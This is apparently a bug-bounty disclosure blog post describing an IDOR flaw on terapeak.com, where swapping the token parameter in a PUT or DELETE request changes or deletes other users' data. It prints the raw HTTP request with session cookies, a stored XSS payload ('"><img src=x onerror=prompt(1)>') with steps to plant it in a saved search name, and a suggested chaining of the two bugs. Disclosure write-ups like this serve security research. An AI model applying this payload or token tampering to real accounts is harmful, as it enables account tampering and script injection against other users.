IDOR – Execute JavaScript into anyone account

Hey guys,

New blog post about critical IDOR issue which I found in terapeak.com which allows attackers to change any user information and delete any saved bulk search remotely through one’s own account by just changing the Token id in Put and DELETE Request.

The request for change and save search info looks like:

PUT /services/users/information?token=801037a4f46eda24abaeded7b6c4a2bca737cdbf73c33b982591e282d504f2b1&ulbrtabid=2c612dce-334d-49c4-ab4a-9080d5544f11&ulpagename=Settings& HTTP/1.1
Host: sell.terapeak.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://sell.terapeak.com/?page=Settings
Content-Length: 40
Cookie: optimizelyEndUserId=oeu1476503787855r0.20443462719204775; optimizelySegments=%7B%22229813889%22%3A%22ff%22%2C%22229833781%22%3A%22referral%22%2C%22229852304%22%3A%22false%22%7D; optimizelyBuckets=%7B%223386134531%22%3A%223408741298%22%2C%227527391520%22%3A%227536641212%22%2C%226456040624%22%3A%226450293330%22%2C%225673570093%22%3A%225673580215%22%7D; __utma=195498537.885603089.1476503793.1478553390.1478557307.14; __utmz=195498537.1476503793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1476504127506%3B1478549584718%3B1478557781949%3B7%3B25; ki_r=; i18next=en-US; tp_ee_last_visit=1161937991; tp_ee_last_activity=1477297991; TERAPEAK_SESSID=t23qp3c6sqbmlgfjgrp1s3ho71; userRole=PHOENIX_PROFESSIONAL; currency=USD; tpebayCurrencyId=1; __tpa=1581941b032c10; tp_x8=69.0803835087417002-082f039pt%2FtjRC5DXUPHA4wudayrnWMIEpG8vsZYSBxk6gNKqoTF0mb7lfQJ1eO92ihV3zcL%3D; __utmc=195498537; localeHeader=en-US,en; totango.heartbeat.last_module=__system; totango.heartbeat.last_ts=1478557779843; lastUrl=https://sell.terapeak.com/; token=801037a4f46eda24abaeded7b6c4a2bca737cdbf73c33b982591e282d504f2b1; tokenExpiry=1510085976101; __utmb=195498537.4.10.1478557307; __utmt=1; optimizelyPendingLogEvents=%5B%5D
Connection: close

{"firstName":"test","type":"userDetail"}

It was observed that by simply changing the value of <token=> in the above URL, it is possible to change user info and delete search and save for the user associated with that particular Token.

Original Request:

Edited Request:

XSS

So I found stored XSS in saved search:

go to https://sell.terapeak.com/?page=eBayProductResearch
write anything in search box and click on search
click on save pop up will come
write your payload into name&nbsp;"><img src=x onerror=prompt(1)>
boom xss will execute.

An attacker can plot IDOR attack to change user saved search with a XSS payload and when user will access his account XSS will pop-up.

Thanks for reading!  Happy Hunting 🙂

 

 

shubhamgupta

 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.